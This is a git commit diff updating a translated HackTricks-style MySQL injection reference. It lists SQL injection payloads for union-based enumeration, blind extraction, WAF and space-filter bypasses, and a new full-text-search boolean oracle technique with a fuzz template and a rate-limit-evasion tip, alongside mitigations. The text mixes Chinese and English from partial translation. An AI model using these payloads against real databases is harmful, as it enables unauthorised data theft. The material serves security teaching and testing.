Translated ['', 'src/pentesting-web/sql-injection/mysql-injection/README

This commit is contained in:
Translator 2025-10-01 00:48:17 +00:00
parent f110387b51
commit 0f28f42612

View File

@ -1,4 +1,4 @@
# MySQL 注入
# MySQL injection
{{#include ../../../banners/hacktricks-training.md}}
@ -48,28 +48,28 @@ strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
```sql
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
```
[https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
来自 [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
## 流程
请记住,在“现代”版本的 **MySQL** 中,您可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"**(这可能有助于绕过 WAF
请记住,在 "现代" 版本的 **MySQL** 中,你可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"** (这可能有助于绕过 WAFs).
```sql
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
```
### **仅一个值**
### **只有 1 个值**
- `group_concat()`
- `Limit X,1`
### **盲注逐个**
### **Blind one by one**
- `substr(version(),X,1)='r'` `substring(version(),X,1)=0x70` `ascii(substr(version(),X,1))=112`
- `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112`
- `mid(version(),X,1)='5'`
### **盲注添加**
### **Blind adding**
- `LPAD(version(),1...lenght(version()),'1')='asd'...`
- `RPAD(version(),1...lenght(version()),'1')='asd'...`
@ -79,7 +79,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
## 检测列数
使用简单的 ORDER
使用一个简单的 ORDER
```
order by 1
order by 2
@ -92,7 +92,7 @@ UniOn SeLect 1,2
UniOn SeLect 1,2,3
...
```
## MySQL 联合查询基础
## MySQL Union Based
```sql
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
@ -101,67 +101,68 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```
## SSRF
**在这里了解不同的选项以** [**滥用Mysql注入来获取SSRF**](mysql-ssrf.md)**。**
**在这里了解不同的选项来** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
## WAF绕过技巧
## WAF 绕过技巧
### 通过预处理语句执行查询
### 通过 Prepared Statements 执行 queries
当允许堆叠查询时可以通过将要执行的查询的十六进制表示分配给一个变量使用SET然后使用PREPARE和EXECUTE MySQL语句最终执行查询从而绕过WAF。类似于这样:
当允许 stacked queries 时,可能可以通过将要执行的 query 的 hex representation 赋值给一个变量(使用 SET然后使用 PREPARE 和 EXECUTE MySQL 语句来最终执行该 query从而绕过 WAFs。像下面这样:
```
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
```
有关更多信息,请参阅 [this blog post](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce)。
欲了解更多信息,请参阅 [这篇博文](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce).
### Information_schema 替代方案
请记住,在“现代”版本的 **MySQL** 中,您可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics**
请记住,在现代版本的 **MySQL** 中,你可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics**
### MySQL 注入无逗号
### MySQLinjection 不使用逗号
选择 2 列而不使用任何逗号 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
在不使用任何逗号的情况下选择两列 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
```
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
```
### 检索没有列名的
### 在不知道列名的情况下检索
如果在某个时刻你知道表的名称,但不知道表内列的名称,你可以尝试执行类似的操作来查找有多少列:
如果你知道表名但不知道表中列名,可以尝试通过执行类似如下的语句来查找表中有多少列:
```bash
# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1); # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
```
假设有两列第一列是ID另一列是flag你可以尝试逐个字符地暴力破解flag的内容
假设有 2 列(第一列为 ID第二列为 flag你可以尝试逐字符对 flag 的内容进行 bruteforce
```bash
# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);
```
更多信息请见 [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
### 无空格注入 (`/**/` 注释技巧)
### Injection without SPACES (`/**/` comment trick)
一些应用程序使用 `sscanf("%128s", buf)` 等函数对用户输入进行清理或解析,这些函数 **在第一个空格字符处停止**。因为 MySQL 将序列 `/**/` 视为注释 *和* 空白,所以可以用它来完全去除有效负载中的正常空格,同时保持查询在语法上有效。
某些应用使用诸如 `sscanf("%128s", buf)` 的函数对用户输入进行清理或解析,这些函数会**在第一个空格字符处停止**。
由于 MySQL 将序列 `/**/` 视为注释 *和* 空白字符,因此它可以用来在保持查询语法有效的同时,完全去除载荷中的普通空格。
示例:基于时间的盲注入绕过空格过滤:
示例 time-based blind injection 用来绕过空格过滤:
```http
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
```
数据库接收
数据库接收到的是
```sql
' OR SLEEP(5)-- -'
```
这在以下情况下特别有用:
这在以下情况尤其有用:
* 可控缓冲区的大小受到限制(例如,`%128s`),并且空格会提前终止输入
* 通过 HTTP 头或其他字段注入,其中正常空格被删除或用作分隔符。
* 与 `INTO OUTFILE` 原语结合使用,以实现完全的预认证 RCE请参见 MySQL 文件 RCE 部分)。
* 可控缓冲区大小受限(例如 `%128s`),空格会导致输入过早结束
* 通过 HTTP headers 或其他字段进行注入,这些字段会剥离或将普通空格用作分隔符。
* 与 `INTO OUTFILE` 原语结合可实现完整的 pre-auth RCE参见 MySQL File RCE 部分)。
---
### MySQL 历史
您可以在 MySQL 中查看其他执行,读取表**sys.x$statement_analysis**
你可以查看 MySQL 中读取该表的其他执行**sys.x$statement_analysis**
### 版本替代**s**
```
@ -169,14 +170,63 @@ mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();
```
## 其他MYSQL注入指南
## MySQL Full-Text Search (FTS) BOOLEAN MODE operator abuse (WOR)
这不是经典的 SQL 注入。当开发者将用户输入传给 `MATCH(col) AGAINST('...' IN BOOLEAN MODE)`MySQL 会在引号内解析一整套布尔搜索操作符。许多 WAF/SAST 规则只关注打破引号quote breaking因此会忽略这一面。
Key points:
- 操作符在引号内被解析: `+` (must include), `-` (must not include), `*` (trailing wildcard), `"..."` (exact phrase), `()` (grouping), `<`/`>`/`~` (weights)。See MySQL docs.
- 这允许在不跳出字符串字面量的情况下进行存在/不存在以及前缀测试,例如 `AGAINST('+admin*' IN BOOLEAN MODE)` 用来检测是否存在以 `admin` 开头的任何词。
- 可用于构建 oracles例如 “does any row contain a term with prefix X?” 并通过前缀扩展枚举隐藏字符串。
Example query built by the backend:
```sql
SELECT tid, firstpost
FROM threads
WHERE MATCH(subject) AGAINST('+jack*' IN BOOLEAN MODE);
```
If the application returns different responses depending on whether the result set is empty (e.g., redirect vs. error message), that behavior becomes a Boolean oracle that can be used to enumerate private data such as hidden/deleted titles.
Sanitizer bypass patterns (generic):
- Boundary-trim preserving wildcard: 如果后端通过类似 `(\b.{1,2})(\s)|(\b.{1,2}$)` 的正则对每个词修剪 12 个尾随字符,则提交 `prefix*ZZ`。清理器会修剪掉 `ZZ`,但保留 `*`,因此 `prefix*` 得以保留。
- Early-break stripping: 如果代码按每个词去除操作符,但在遇到任意长度 ≥ min length 的 token 时停止处理,就发送两个 token第一个是满足长度阈值的垃圾 token第二个携带操作符 payload。例如`&&&&& +jack*ZZ` → after cleaning: `+&&&&& +jack*`.
Payload template (URL-encoded):
```
keywords=%26%26%26%26%26+%2B{FUZZ}*xD
```
- `%26``&``%2B``+`。尾随的 `xD`(或任何两个字母)会被 cleaner 修剪,但保留 `{FUZZ}*`
- 将重定向视为 “match”错误页面视为 “no match”。不要自动跟随重定向以便保持 oracle 可观测。
枚举工作流程:
1) 从 `{FUZZ} = a…z,0…9` 开始,通过 `+a*`, `+b*`, … 找到首字母匹配。
2) 对于每个正向前缀,分支:`a* → aa* / ab* / …`。重复以恢复整个字符串。
3) 如果应用实行流量控制分散请求proxies、多个账户
为什么标题经常 leak 而内容不会:
- 有些应用仅在对标题/主题进行初步 MATCH 之后才应用可见性检查。如果控制流在过滤之前依赖于 “any results?” 的结果,那么会发生存在性 leak。
缓解措施:
- 如果不需要 Boolean 逻辑,使用 `IN NATURAL LANGUAGE MODE`或将用户输入视为字面值escape/quote 会在其他模式中禁用运算符)。
- 如果需要 Boolean 模式在分词tokenization后对每个 token 剥离或中和所有 Boolean 运算符(`+ - * " ( ) < > ~`)(不要提前中断)。
- 在 MATCH 之前应用可见性/授权过滤,或在结果集为空与非空时统一响应(恒定的时延/状态)。
- 检查其他 DBMS 中的类似功能PostgreSQL 的 `to_tsquery`/`websearch_to_tsquery`、SQL Server/Oracle/Db2 的 `CONTAINS` 也会解析带引号参数内部的运算符。
注意:
- Prepared statements 无法防止对 `REGEXP` 或搜索运算符的语义滥用。像 `.*` 这样的输入即使在带引号的 `REGEXP '.*'` 内仍然是一个宽松的正则。使用允许列表 (allow-lists) 或显式保护措施。
## Other MYSQL injection guides
- [PayloadsAllTheThings MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
## 参考文献
## 参考资料
- [PayloadsAllTheThings MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
- [MySQL Full-Text Search Boolean mode](https://dev.mysql.com/doc/refman/8.4/en/fulltext-boolean.html)
- [MySQL Full-Text Search Overview](https://dev.mysql.com/doc/refman/8.4/en/fulltext-search.html)
- [MySQL REGEXP documentation](https://dev.mysql.com/doc/refman/8.4/en/regexp.html)
- [ReDisclosure: New technique for exploiting Full-Text Search in MySQL (myBB case study)](https://exploit.az/posts/wor/)
{{#include ../../../banners/hacktricks-training.md}}